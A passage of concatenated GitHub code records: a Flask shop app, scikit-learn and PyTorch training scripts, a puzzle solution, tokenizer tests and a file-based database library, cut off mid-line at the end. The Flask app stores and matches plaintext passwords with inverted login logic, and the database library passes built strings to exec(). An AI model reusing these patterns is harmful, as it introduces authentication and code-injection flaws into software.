create_user():\n name = request.form[\"name\"]\n email = request.form[\"email\"]\n password = request.form[\"password\"] \n\n user = User(email, password)\n db.session.add(user)\n db.session.commit() \n\n return redirect(url_for(\"login\")) \n\n# Ruta de logueo de usuario\n\n@app.route('/login')\ndef login():\n return render_template(\"login.html\")\n\n\n@app.route('/check_user', methods=['POST'])\ndef check_user():\n email = request.form[\"email\"]\n password = request.form[\"password\"]\n users = User.query.filter(User.password==password,User.email==email)\n\n try:\n if(users[0] is not None):\n return render_template(\"register.html\")\n\n except:\n return redirect(url_for(\"product\")) \n\n\n # Insertar en DB\n # Buscar código en la DB\n # Si no existe el código, crearlo en la DB\n # Si existe el código, redireccionar a la página de register\n\n\n# Rutas de otras acciones\n\n@app.route(\"/product\", methods=[\"GET\", \"POST\"])\ndef crud_product():\n if request.method == \"GET\":\n\n # Pedir un producto\n \n print(\"Llegó un GET\")\n\n # Insertar producto\n\n name = \"Jabon de cuerpo\"\n brand = \"Palmolive\"\n presentation = \"barra\"\n category = \"Aseo\"\n price = 2500\n amount = 1\n due_date = datetime.datetime(int(2001), int(9), int(24))\n income_type = \"proveedor\"\n supplier = \"Makro\"\n location = \"Estante 1\"\n\n entry = Product(name,brand,presentation,category,price,amount,due_date,income_type,supplier,location)\n db.session.add(entry)\n db.session.commit()\n \n return \"Esto fue un GET\"\n\n elif request.method == \"POST\":\n\n # Registrar un producto\n\n request_data = request.form\n name = request_data[\"name\"]\n brand = request_data[\"brand\"]\n presentation = request_data[\"presentation\"]\n category = request_data[\"category\"]\n price = request_data[\"price\"]\n\n print(\"Nombre:\" + name)\n print(\"Marca:\" + brand)\n print(\"Presentación:\" + presentation)\n print(\"Categoria:\" + category)\n print(\"Precio:\" + price)\n\n # Insertar en la base de datos el producto\n\n return \"Se registró el producto exitosamente\"\n\n# Actualizar productos\n\n@app.route('/updateproduct')\ndef update_product():\n old_name = \"Jabon de cuerpo\"\n new_name = \"Jabon de loza\"\n old_product = Product.query.filter_by(name=old_name).first()\n old_product.name = new_name\n db.session.commit()\n return \"Actualización exitosa\"\n\n# Consultar productos\n\n@app.route('/getproduct')\ndef get_product():\n songs = Product.query.all()\n print(Product[0].category)\n return \"Se trajo la lista de productos\"\n\n# Eliminar productos\n\n@app.route('/deleteproduct')\ndef delete_product():\n product_name = \"Jabon de cuerpo\"\n product = Product.query.filter_by(name=product_name).first()\n db.session.delete(product)\n db.session.commit()\n return \"Se eliminó el producto\"\n\n\nif __name__ == \"__main__\":\n app.run()\n\n","repo_name":"AndresUseda/Pruebatienda","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4075,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"7937210384","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 27 17:13:56 2019\n\n@author: xumw1\n\"\"\"\nimport sklearn\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.svm import SVC\nfrom sklearn.ensemble import AdaBoostClassifier\nimport pandas as pd\nimport numpy as np\nimport os\n\nfrom characters import characters\nfrom sklearn.externals.six.moves import zip\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.tree import DecisionTreeClassifier\n\ndef use_data():\n '''baseline'''\n print('-------baseline--------')\n path = '../data/train.csv'\n \n data, petid, labels = characters(path, explore=False)\n X = data\n y = labels\n \n \n X_train, X_test, y_train, y_test = train_test_split(\n X, y, random_state = 0)\n print(\"X_train created, shape = \" + str(X_train.shape))\n print(\"y_train created, shape = \" + str(y_train.shape))\n \n print(\"X_test created, shape = \" + str(X_test.shape))\n print(\"y_test created, shape = \" + str(y_test.shape))\n # compare between models\n #print('SVM')\n #clf = SVC(gamma='auto')\n #clf.fit(X_train, y_train) \n #print(\"Training set score: {:.3f}\".format(clf.score(X_train, y_train)))\n #print(\"Test set score: {:.3f}\".format(clf.score(X_test, y_test)))\n \n print('AdaBoost')\n ada = AdaBoostClassifier()\n ada.fit(X_train, y_train)\n print(\"Training set score: {:.3f}\".format(ada.score(X_train, y_train)))\n print(\"Test set score: {:.3f}\".format(ada.score(X_test, y_test)))\n \n# print('AdaBoosted Decision Trees')\n# bdt_real = AdaBoostClassifier(\n# DecisionTreeClassifier(max_depth=2),\n# n_estimators=600,\n# learning_rate=1)\n# \n# bdt_discrete = AdaBoostClassifier(\n# DecisionTreeClassifier(max_depth=2),\n# n_estimators=600,\n# learning_rate=1.5,\n# algorithm=\"SAMME\")\n# \n# bdt_real.fit(X_train, y_train)\n# bdt_discrete.fit(X_train, y_train)\n# \n# real_test_errors = []\n# discrete_test_errors = []\n# \n# for real_test_predict, discrete_train_predict in zip(\n# bdt_real.staged_predict(X_test), bdt_discrete.staged_predict(X_test)):\n# real_test_errors.append(\n# 1. - accuracy_score(real_test_predict, y_test))\n# discrete_test_errors.append(\n# 1. - accuracy_score(discrete_train_predict, y_test))\n# print(\"Test set score: {:.3f}\".format(1-real_test_errors[-1]))\n \n '''prediction'''\n print('prediction')\n ada.fit(X, y)\n path_test = '../data/test.csv'\n data_predict, _, _ = characters(path_test, explore=False)\n \n X_predict = data_predict\n predict = ada.predict(X_predict)\n \n return predict\n\ndef use_explored_data():\n '''explored data'''\n print('-------revised--------')\n path = '../data/train_explore_mod.csv'\n \n data, petid, labels = characters(path, explore=True)\n X = data\n y = labels\n \n \n X_train, X_test, y_train, y_test = train_test_split(\n X, y, random_state = 42)\n print(\"X_train created, shape = \" + str(X_train.shape))\n print(\"y_train created, shape = \" + str(y_train.shape))\n \n print(\"X_test created, shape = \" + str(X_test.shape))\n print(\"y_test created, shape = \" + str(y_test.shape))\n \n # compare between models\n #print('SVM')\n #clf = SVC(gamma='auto')\n #clf.fit(X_train, y_train) \n #print(\"Training set score: {:.3f}\".format(clf.score(X_train, y_train)))\n #print(\"Test set score: {:.3f}\".format(clf.score(X_test, y_test)))\n \n print('AdaBoost')\n ada = AdaBoostClassifier()\n ada.fit(X_train, y_train)\n print(\"Training set score: {:.3f}\".format(ada.score(X_train, y_train)))\n print(\"Test set score: {:.3f}\".format(ada.score(X_test, y_test)))\n \n '''prediction'''\n print('prediction')\n ada.fit(X, y)\n path_test = '../data/test.csv'\n data_predict, _, _ = characters(path_test, explore=True)\n \n X_predict = data_predict\n predict = ada.predict(X_predict)\n \n return predict\n\nif __name__ == '__main__':\n prediction0 = use_data()\n# prediction1 = use_explored_data()\n#\n sub = pd.read_csv(os.path.join('../input/test/sample_submission.csv'))\n \n submission0 = pd.DataFrame({'PetID': sub.PetID, 'AdoptionSpeed': [int(i) for i in prediction0]})\n submission0.head()\n submission0.to_csv('../submission_tableonly.csv', index=False)\n# \n# \n# submission1 = pd.DataFrame({'PetID': sub.PetID, 'AdoptionSpeed': [int(i) for i in prediction1]})\n# submission1.head()\n# submission1.to_csv('../submission_exploretableonly.csv', index=False)\n","repo_name":"wangjinjie722/How-cute-is-my-pet","sub_path":"src/explore_statistical.py","file_name":"explore_statistical.py","file_ext":"py","file_size_in_byte":4601,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"17848453514","text":"from typing import List\nfrom collections import Counter\n\n\ndef parse_input(filename: str) -> List[str]:\n return [line.strip() for line in open(filename).readlines()]\n\n\ndef part1(box_ids: List[str]) -> int:\n two_counts = 0\n three_counts = 0\n\n for box_id in box_ids:\n counts = Counter(box_id)\n if 2 in counts.values():\n two_counts += 1\n if 3 in counts.values():\n three_counts += 1\n return two_counts * three_counts\n\n\ndef diff_by_one(str1: str, str2: str) -> str:\n result = ''\n for i in range(len(str1)):\n if str1[i] != str2[i]:\n if result != '':\n return ''\n result = str1[:i] + str1[i + 1:]\n return result\n\n\ndef part2(box_ids: List[str]) -> str:\n for box_id in box_ids:\n for other in box_ids:\n if other == box_id:\n continue\n result = diff_by_one(box_id, other)\n if result != '':\n return result\n return ''\n\n\ndef main():\n box_ids = parse_input('input/day2.txt')\n print(f'Part 1: {part1(box_ids)}')\n print(f'Part 2: {part2(box_ids)}')\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"TessFerrandez/AdventOfCode-Python","sub_path":"2018/day2.py","file_name":"day2.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"79"} +{"seq_id":"9971619555","text":"import torch\nfrom utils import *\nfrom train_resnet import *\nfrom denoise_ae import AutoEncoder\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-s', '--size', type=int, default=64, help='size of patches')\nparser.add_argument('-m', '--magnitude', type=int, default=200, help='magnitude of breakHis dataset to use')\nparser.add_argument('-bs', '--batch-size', type=int, default=512)\nparser.add_argument('-de', '--denoising_epochs', type=int, default=50)\nparser.add_argument('-re', '--resnet_epochs', type=int, default=35)\nparser.add_argument('-g', '--gpus', nargs='+', type=str, default=os.environ[\"CUDA_VISIBLE_DEVICES\"].split(sep=','),\n help='number of GPUs to use')\nparser.add_argument('-d', '--denoising', type=bool, default=True, help='number of GPUs to use')\nparser.add_argument('-p', '--save_path', type=str, default='results/', help='path to save the result files')\nparser.add_argument('-ld', '--load_dae', type=bool, default=True, help='load pretrained DAE')\nparser.add_argument('-dp', '--dae_path', type=str, default='dae10.pt', help='path to load or save DAE')\nparser.add_argument('-n', '--noise_strength', type=int, default=10)\nparser.add_argument('-c', '--n_components', type=int, default=100)\n\nargs = parser.parse_args()\nprint(args)\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = ','.join(args.gpus)\nprint('Using GPUs:', os.environ[\"CUDA_VISIBLE_DEVICES\"])\n\n# load data\next = str(args.size) + '_' + str(args.magnitude) + 'X.npy'\nwith open('data/'+ext, 'rb') as f:\n train = np.load(f)\n valid = np.load(f)\n test = np.load(f)\n\ntrain = DataSet(train[:,:-1].reshape(-1, args.size, args.size, 3).astype(float), train[:,-1].astype(np.long))\nvalid = DataSet(valid[:,:-1].reshape(-1, args.size, args.size, 3).astype(float), valid[:,-1].astype(np.long))\ntest = DataSet(test[:,:-1].reshape(-1, args.size, args.size, 3).astype(float), test[:,-1].astype(np.long))\n\nif args.denoising:\n train_subset = train.images[::100]\n val_subset = valid.images[::100]\n model = AutoEncoder(n_inputs=train_subset.shape[1], lr=1e-3, batch_size=512, noise_strength=args.noise_strength,\n path=args.dae_path, load_weights=False, plot=False, n_components=args.n_components)\n\n if not args.load_dae:\n model.fit(train_subset, Xd=val_subset, epochs=args.denoising_epochs)\n \n # apply denoising\n train = DataSet(model.transform(train.images).transpose(0,2,3,1), train.classes)\n valid = DataSet(model.transform(valid.images).transpose(0,2,3,1), valid.classes)\n test = DataSet(model.transform(test.images).transpose(0,2,3,1), test.classes)\n torch.cuda.empty_cache()\n \n# train classifier\ntrain_acc, test_acc, train_f1, test_f1 = train_resnet(train, valid, test, args.batch_size, args.resnet_epochs)\nsavetxt(args.save_path + str(args.size) + '_' + str(args.magnitude) + '_acc.csv',\n array([train_acc, test_acc, train_f1, test_f1]), delimiter=',')\ntorch.cuda.empty_cache()","repo_name":"rabbou/BreastCancer-DAE","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"39530585122","text":"# -*- coding: utf-8 -*-\n#\n# This file is part of the SKA Tango Base project\n#\n#\n#\n\"\"\"Release information for ska_tango_base Python Package\"\"\"\n\nname = \"\"\"ska_tango_base\"\"\"\nversion = \"0.11.1\"\nversion_info = version.split(\".\")\ndescription = \"\"\"A set of generic base devices for SKA Telescope.\"\"\"\nauthor = \"SKA India and SARAO and CSIRO and INAF\"\nauthor_email = \"adityadange.ska at gmail.com\"\nlicense = \"\"\"BSD-3-Clause\"\"\"\nurl = \"\"\"https://www.skatelescope.org/\"\"\"\ncopyright = \"\"\"NCRA and SARAO and CSIRO and INAF\"\"\"\n","repo_name":"ska-telescope/lmc-base-classes","sub_path":"src/ska_tango_base/release.py","file_name":"release.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"6262730943","text":"import unittest\nfrom stream_utils import Token, NUMBER, STRING, SYMBOL, OPERATOR, IDENTIFIER, KEYWORD, SPACES\nfrom tsql_tokenizr import TSQL_OPERATORS_LENGTHS, tsql_tokenize\n\n\nclass TestTsqlTokenizer(unittest.TestCase):\n def test_operator_lengths(self):\n assert TSQL_OPERATORS_LENGTHS == [2, 1]\n\n def test_number(self):\n stream = \"123\"\n tokens = tsql_tokenize(stream)\n assert tokens[0] == Token(NUMBER, \"123\", 0, 0, 0)\n\n def test_float(self):\n stream = \"123.33\"\n tokens = tsql_tokenize(stream)\n assert tokens[0] == Token(NUMBER, stream, 0, 0, 0)\n\n def test_string(self):\n stream = \"'abc ''123'''\"\n tokens = tsql_tokenize(stream)\n assert tokens[0] == Token(STRING, stream, 0, 0, 0)\n\n def test_string1(self):\n stream = \"'123','abc'\"\n tokens = tsql_tokenize(stream)\n assert tokens[0] == Token(STRING, \"'123'\", 0, 0, 0)\n assert tokens[1] == Token(SYMBOL, \",\", 5, 0, 5)\n assert tokens[2] == Token(STRING, \"'abc'\", 6, 0, 6)\n\n def test_operator(self):\n stream = \"<>\"\n tokens = tsql_tokenize(stream)\n assert tokens[0] == Token(OPERATOR, stream, 0, 0, 0)\n\n def test_symbol(self):\n stream = \".\"\n tokens = tsql_tokenize(stream)\n assert tokens[0] == Token(SYMBOL, stream, 0, 0, 0)\n\n def test_tb1_name(self):\n tokens = tsql_tokenize(\"tb1.name\")\n assert tokens == [\n Token(IDENTIFIER, \"tb1\", 0, 0, 0),\n Token(SYMBOL, \".\", 3, 0, 3),\n Token(IDENTIFIER, \"name\", 4, 0, 4)\n ]\n\n def test_select_keyword(self):\n tokens = tsql_tokenize(\"select\")\n assert tokens == [\n Token(KEYWORD, \"select\", 0, 0, 0)\n ]\n\n def test_select_from_table(self):\n tokens = tsql_tokenize(\"select tb1.name from customer\")\n assert tokens == [\n Token(KEYWORD, \"select\", 0, 0, 0),\n Token(SPACES, \" \", 6, 0, 6),\n Token(IDENTIFIER, \"tb1\", 7, 0, 7),\n Token(SYMBOL, \".\", 10, 0, 10),\n Token(IDENTIFIER, \"name\", 11, 0, 11),\n Token(SPACES, \" \", 15, 0, 15),\n Token(KEYWORD, \"from\", 16, 0, 16),\n Token(SPACES, \" \", 20, 0, 20),\n Token(IDENTIFIER, \"customer\", 21, 0, 21),\n ]\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"flashlin/Samples","sub_path":"py_standard/tests/test_tsql_tokenizr.py","file_name":"test_tsql_tokenizr.py","file_ext":"py","file_size_in_byte":2346,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"79"} +{"seq_id":"39857261318","text":"\"\"\" Script for running depth inference assuming MOTS dataset structure \"\"\"\nimport logging\nimport os\nimport sys\nfrom pathlib import Path, PurePath\n\nimport click\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport tensorflow.compat.v1 as tf\nfrom IPython.core import ultratb\nfrom PIL import Image\n\nimport diw\nfrom diw.model import Model, get_vars_to_save_and_restore\n\nsys.excepthook = ultratb.FormattedTB(mode=\"Verbose\", color_scheme=\"Linux\", call_pdb=1)\n\n_logger = logging.getLogger(__name__)\n\n\ndef load_image(img_file):\n \"\"\"Load image from disk. Output value range: [0,255].\"\"\"\n return Image.open(img_file).convert(\"RGB\")\n\n\ndef resize_img(img, img_shape):\n \"\"\" resizes an image \"\"\"\n return img.resize(img_shape, Image.LANCZOS).convert(\"RGB\")\n\n\ndef plot_image(image, image_type=\"RGB\"):\n \"\"\" plots image with matplotlib \"\"\"\n plt.figure()\n color_map = None\n if image_type != \"RGB\":\n color_map = plt.cm.get_cmap(\"plasma\").reversed()\n plt.imshow(image, cmap=color_map)\n plt.show() # display it\n return plt\n\n\n@click.command()\n@click.option(\n \"--checkpoint_dir\",\n \"checkpoint_dir\",\n default=\"./data/checkpoints/test\",\n type=click.Path(exists=True),\n help=\"Path to the model checkpoint\",\n)\n@click.option(\n \"--data_dir\",\n \"data_dir\",\n default=\"./data/test/mots_data\",\n type=click.Path(exists=True),\n help=\"Path to MOTS data\",\n)\n@click.option(\n \"--save_img\",\n \"save_img\",\n flag_value=True,\n help=\"Flag to whether save the image of the depth (besides numpy array)\",\n)\n@click.version_option(diw.__version__)\ndef main(data_dir, checkpoint_dir, save_img):\n if save_img:\n plt.figure()\n height, width = 128, 416\n os.environ[\"TF_FORCE_GPU_ALLOW_GROWTH\"] = \"true\" # to fix CUDA bug\n inference_model = Model(\n is_training=False, batch_size=1, img_height=height, img_width=width\n )\n checkpoint = tf.train.latest_checkpoint(checkpoint_dir)\n vars_to_restore = get_vars_to_save_and_restore(checkpoint)\n saver = tf.train.Saver(vars_to_restore)\n with tf.Session() as sess:\n saver.restore(sess, checkpoint)\n sequence_paths = [p for p in Path(data_dir).glob(\"*\") if p.is_dir()]\n for seq_path in sequence_paths:\n model_name = PurePath(checkpoint_dir).parts[-1]\n (seq_path / model_name).mkdir(parents=True, exist_ok=True)\n if save_img:\n (seq_path / (model_name + \"_depth_images\")).mkdir(\n parents=True, exist_ok=True\n )\n img_paths = sorted(\n [p for p in (seq_path / \"img1\").glob(\"*\") if p.is_file()],\n key=lambda path: str(path),\n )\n for img_path in img_paths:\n img_name = img_path.parts[-1].split(\".\")[0]\n print(\"Processing sequence: {}, image: {}\".format(seq_path, img_name))\n image = load_image(str(img_path))\n image = resize_img(image, (width, height))\n image = np.array(image)\n image = image[None, ...]\n depth = inference_model.inference_depth(image, sess)\n depth = depth[0, :, :, 0]\n np.save(str(seq_path / model_name / img_name), depth)\n if save_img:\n plt.imshow(depth, plt.cm.get_cmap(\"plasma\").reversed())\n plt.savefig(\n str(seq_path / (model_name + \"_depth_images\"))\n + \"/\"\n + (img_name + \".png\")\n )\n plt.clf()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"VladimirYugay/diw","sub_path":"scripts/run_mots_depth_inference.py","file_name":"run_mots_depth_inference.py","file_ext":"py","file_size_in_byte":3623,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"35339443981","text":"import os,errno,hashlib,shutil,datetime,random,csv as csvm\nfrom .status import error,success,info,config_status as statusc\nfrom .functions.functions import *\nfrom .functions.subclass import subclass\nfrom .operators import *\nfrom pathlib import Path\n\nclass pi7db:\n def __init__(self,db_name,db_path=\"\"):\n self.db_np,self.recover_croupt,self.db_name,self.temp_limt = os.path.join(db_path,db_name),False,db_name,120\n self.config_file,self.coll_name = os.path.join(self.db_np,db_name),None\n if not os.path.exists(self.db_np):os.makedirs(self.db_np)\n if not os.path.exists(f\"{self.config_file}\"):\n self.config = {'secret-key':None,'doc_size':self.doc_size}\n writedoc(f\"{self.config_file}\",self.config)\n else:self.config={'secret-key':None,'doc_size':self.doc_size}\n self.doc_size=10000000\n self.recoverbackups()\n \n def recoverbackups(self):\n for x in extractbackups(f\"{self.db_np}\"):\n os.replace(x, x.replace('.backup',''))\n\n def __setattr__(self, name, value):\n self.__dict__[name] = value\n if name == 'recover_croupt':\n self._recover_croupt = statusc.recover_status = value\n if name == 'doc_size' and self.config:\n self.config['doc_size'] = value\n\n def __getattr__(self, attrname):\n if attrname == \"temp\":\n path=self.coll_name=os.path.join(self.db_np,attrname)\n SubClass = type(attrname,(subclass,),{'key':self.key,'config_file':self.config_file,'p_filter':self.filter,'p_sortdict':self.sortdict,'p_update':self.update,'p_trash':self.trash,'p_write':self.write,'config':self.config,'db_np':self.db_np,'db_name':self.db_name,\"temp_limt\":self.temp_limt})\n SubClass = SubClass()\n return SubClass\n \n def key(self,password):\n if isinstance(password,dict):\n if password['secret-key'] is None and self.config['secret-key'] is not None:raise ValueError(error.e6)\n else:key=password['secret-key']\n else:key = hashlib.md5(password.encode()).hexdigest()\n if self.config['secret-key'] is not None:\n if key != self.config['secret-key']:raise ValueError(error.e0)\n else:\n self.config['secret-key'] = key\n writedoc(self.config_file,self.config)\n\n def changekey(self,old_key,New_key):\n files,old_key,New_key = extractfiles(self.db_np,extract_kwargs({},self.db_name)),hashlib.md5(old_key.encode()).hexdigest(),hashlib.md5(New_key.encode()).hexdigest()\n if old_key == opendoc(self.config_file)['secret-key']:\n for x_js in files:\n writedoc(x_js,opendoc(x_js,old_key),New_key)\n writedoc(self.config_file,{'secret-key':New_key})\n else:raise ValueError(error.e1)\n\n def rename(self,coll_name,doc_name,new_name):\n path,new_path = os.path.join(self.db_np,coll_name,doc_name),os.path.join(self.db_np,coll_name,new_name)\n if os.path.exists(path):\n self.update(coll_name,doc_name,{\"cr_dc_path\":new_path})\n os.rename(path,new_path)\n return success.s5(doc_name,new_name)\n else:return error.e7(doc_name)\n\n def status(self):\n dic = {}\n for f in [f for f in os.scandir(self.db_np) if f.is_dir()]:\n doc = extractfiles(f.path,extract_kwargs({},self.db_name))\n dic[f.name] = {\"Total_Files\":len(doc),\"Doc_Name\":map(lambda f:f.split(\"/\")[-1],doc)}\n return dic \n \n def exists(self,file_name,coll_name=None,**kwargs):\n if coll_name is not None:data_files = extractfiles(f\"{self.db_np}/{coll_name}\",kwargs)\n else:data_files = extractfiles(f\"{self.db_np}\",extract_kwargs(kwargs,self.db_name))\n for x_file in data_files:\n if file_name == x_file.split('/')[-1]:\n if 'today' in kwargs and kwargs['today']==True:\n if datetime.date.today() == datetime.date.fromtimestamp(Path(x_file).stat().st_mtime):return True\n else:return False\n else:return True\n return False\n\n def write(self,coll_name,fn_dict,data=None):\n self.key(self.config)\n path = os.path.join(self.db_np,coll_name)\n if data is None and isinstance(fn_dict,dict) or all([isinstance(x,dict) for x in fn_dict]):\n if isinstance(fn_dict,list):return writenodoc(path,fn_dict,self.config)\n else:fn_dict={'unid':unid(),**fn_dict};return writenodoc(path,fn_dict,self.config)\n else:\n try:\n data_dict={'unid':unid(),**data}\n data_dict['cr_dc_path'] = f\"{path}/{fn_dict}\";create_coll(path)\n writedoc(data_dict['cr_dc_path'],data_dict,self.config['secret-key'])\n return success.s0(fn_dict, self.coll_name)\n except Exception as e:return error.e4\n \n def update(self,coll_name,file_name=None,data_arg=None,**kwargs):\n self.key(self.config)\n if \"where\" in kwargs:\n if isinstance(coll_name,str) and isinstance(file_name,dict):\n if isinstance(kwargs['where'],list) or isinstance(kwargs['where'],tuple):updatebyfilter(self.filter(coll_name,*kwargs['where'])['data'],file_name,{**self.config,**kwargs,\"coll_name\":coll_name,\"write_func\":self.write})\n else:return updatebyfilter(self.filter(coll_name,kwargs['where'])['data'],file_name,{**self.config,**kwargs,\"coll_name\":coll_name,\"write_func\":self.write})\n if isinstance(coll_name,dict) and file_name is None:\n if isinstance(kwargs['where'],list) or isinstance(kwargs['where'],tuple):updatebyfilter(self.filter(coll_name,*kwargs['where'])['data'],coll_name,{**self.config,**kwargs})\n else:return updatebyfilter(self.filter(kwargs['where'])['data'],coll_name,{**self.config,**kwargs})\n try:\n js_data=opendoc(f\"{self.db_np}/{coll_name}/{file_name}\",self.config['secret-key'])\n if isinstance(data_arg,dict):js_data=nes_update(js_data,data_arg,**kwargs)\n else:return error.e2\n writedoc(f\"{self.db_np}/{coll_name}/{file_name}\",js_data,self.config['secret-key'])\n return success.s1(1)\n except OSError as e:\n if isinstance(file_name,dict):\n if 'write' in kwargs and kwargs['write']==True:return self.write(coll_name,file_name)\n else:\n if e.errno == errno.ENOENT:return error.e3(None)\n elif e.errno == 2:\n if 'write' in kwargs and kwargs['write']==True:return self.write(coll_name,file_name,data_arg)\n else:return e\n\n def read(self,coll_name=None,file_name=None,key_name=None,**kwargs):\n self.key(self.config)\n kwargs,data_files,r_data = extract_kwargs(kwargs,self.db_name),[],{\"data\":[],\"status\":1}\n if key_name is not None:return {\"data\":opendoc(f\"{self.db_np}/{coll_name}/{file_name}\",self.config['secret-key'])[key_name],\"status\":1}\n elif file_name is not None:data_files=[f\"{self.db_np}/{coll_name}/{file_name}\"]\n elif coll_name is not None:data_files = extractfiles(f\"{self.db_np}/{coll_name}\",kwargs)\n else:data_files = extractfiles(f\"{self.db_np}\",kwargs)\n for x_file in data_files[kwargs['f_a']:kwargs['l_a']]:\n o_data = opendoc(x_file,self.config['secret-key'])\n if isinstance(o_data,list):r_data['data'].extend(o_data)\n else:r_data['data'].append(o_data)\n return r_data\n \n def trash(self,coll_name=None,file_name=None,key_name=None,**kwargs):\n self.key(self.config)\n if len(kwargs):\n if 'dropkey' in kwargs:key_name=kwargs['dropkey']\n if isinstance(coll_name,str) and 'where' in kwargs:\n if isinstance(kwargs['where'],list) or isinstance(kwargs['where'],tuple):trashbyfilter(self.filter(coll_name,*kwargs['where'])['data'],key_name,self.config)\n else:trashbyfilter(self.filter(coll_name,kwargs['where'])['data'],key_name,self.config)\n return True\n if 'where' in kwargs and coll_name is None:\n if isinstance(kwargs['where'],list) or isinstance(kwargs['where'],tuple):trashbyfilter(self.filter(coll_name,*kwargs['where'])['data'],key_name,self.config)\n else:trashbyfilter(self.filter(kwargs['where'])['data'],key_name,self.config)\n return True\n if key_name is not None and isinstance(key_name,set) or isinstance(key_name,dict):\n tr_data = opendoc(f\"{self.db_np}/{coll_name}/{file_name}\",self.config['secret-key'])\n writedoc(f\"{self.db_np}/{coll_name}/{file_name}\",nes_trash(tr_data,key_name),self.config['secret-key'])\n return success.s2(key_name,file_name)\n elif file_name is not None and isinstance(file_name,str):\n os.remove(f\"{self.db_np}/{coll_name}/{file_name}\")\n return success.s3(file_name)\n elif coll_name is not None:\n if isinstance(coll_name,str):coll_name = [coll_name]\n if 'IGNORE' in kwargs:\n if isinstance(kwargs['IGNORE'],str):kwargs['IGNORE'] = [kwargs['IGNORE']]\n for x in coll_name:\n for x_file in extractfiles(f\"{self.db_np}/{x}\",kwargs):os.remove(x_file)\n else:\n for x in coll_name:shutil.rmtree(f\"{self.db_np}/{x}\", ignore_errors=False, onerror=None)\n return success.s4(\",\".join(coll_name))\n elif coll_name is None and 'IGNORE_COLLECTION' in kwargs:\n collections = list(self.status().keys())\n if isinstance(kwargs['IGNORE_COLLECTION'],str):kwargs['IGNORE_COLLECTION'] = [kwargs['IGNORE_COLLECTION']]\n for x in kwargs['IGNORE_COLLECTION']:collections.remove(x)\n for x in collections:shutil.rmtree(f\"{self.db_np}/{x}\", ignore_errors=False, onerror=None)\n return success.s4(\",\".join(collections))\n\n def sort(self,coll_name,command_tup=None,**kwargs):\n self.key(self.config)\n un_ex_kwargs,kwargs,order = kwargs,extract_kwargs(kwargs,self.db_name),False\n if \"order\" in kwargs:order = kwargs['order']\n if isinstance(coll_name,set):all_data,command_tup=self.read(**un_ex_kwargs),coll_name\n else:all_data=self.read(coll_name,**un_ex_kwargs)\n r_data = {\"data\":all_data['data'],\"status\":1}\n if isinstance(command_tup,set):\n key_tup = \"i\"+str([[x] for x in command_tup])[1:-1].replace(', ',\"\")\n r_data['data'] = sorted(r_data['data'], key = lambda i:(exec('global s;s = %s' % key_tup),s),reverse=order)\n else: \n if isinstance(command_tup,str):r_data['data'] = sorted(r_data['data'],key = lambda i: i[command_tup],reverse=order)[kwargs['f_a']:kwargs['l_a']]\n return r_data\n\n def sortdict(self,dict_list,sort_key,**kwargs):\n kwargs,order,r_data = extract_kwargs(kwargs,self.db_name),False,{\"data\":dict_list['data'],\"status\":1}\n if \"order\" in kwargs:order = kwargs['order']\n if isinstance(sort_key,set):\n key_tup = \"i\"+str([[x] for x in sort_key])[1:-1].replace(', ',\"\")\n r_data['data'] = sorted(r_data['data'][kwargs['f_a']:kwargs['l_a']], key = lambda i:(exec('global s;s = %s' % key_tup),s),reverse=order)\n else: \n if isinstance(sort_key,str):r_data['data'][kwargs['f_a']:kwargs['l_a']] = sorted(r_data['data'],key = lambda i: i[sort_key],reverse=order)\n return r_data\n \n def filter(self,*command_tup,**kwargs):\n self.key(self.config)\n un_ex_kwargs,kwargs = kwargs,extract_kwargs(kwargs,self.db_name)\n if \"IGNORE\" in kwargs:un_ex_kwargs[\"IGNORE\"] = kwargs[\"IGNORE\"]\n if isinstance(command_tup[0],str):command_tup,all_data = list(command_tup[1:]),[command_tup[0]]\n elif 'dict' in kwargs:all_data = kwargs['dict']\n else:\n if 'IGNORE_COLLECTION' in kwargs:\n if isinstance(kwargs['IGNORE_COLLECTION'],str):kwargs['IGNORE_COLLECTION']=[kwargs['IGNORE_COLLECTION']]\n else:kwargs['IGNORE_COLLECTION']=[]\n all_data = [x for x in self.status().keys() if x not in kwargs['IGNORE_COLLECTION']]\n r_data,command_arr= {\"data\":[],'status':1},[]\n if OR in command_tup:\n for x_p in command_tup:\n if x_p != OR:command_arr.append(x_p)\n for command in command_arr:\n data_get = no_freeze_filter(self,command,all_data,kwargs,un_ex_kwargs)\n for x_l in data_get:\n for x in x_l:\n if x not in r_data['data']:r_data['data'].append(x)\n return r_data\n else:\n for x_L in no_freeze_filter(self,command_tup[0],all_data,kwargs,un_ex_kwargs):\n for x_r in x_L:r_data['data'].append(x_r)\n return r_data\n \n def readkey(self,coll_name=None,**kwargs):\n if not 'key' in kwargs:raise KeyError(\"Key Is Required\")\n self.key(self.config)\n r_data,kwargs = {\"data\":[],\"status\":1},extract_kwargs(kwargs,self.db_name)\n if isinstance(kwargs['key'],str):kwargs['key'] = [kwargs['key']]\n if coll_name is not None:data_files = extractfiles(f\"{self.db_np}/{coll_name}\",kwargs)\n else:data_files = extractfiles(f\"{self.db_np}\",kwargs)\n for x_file in data_files[kwargs['f_a']:kwargs['l_a']]:\n o_data = opendoc(x_file,self.config['secret-key'])\n if 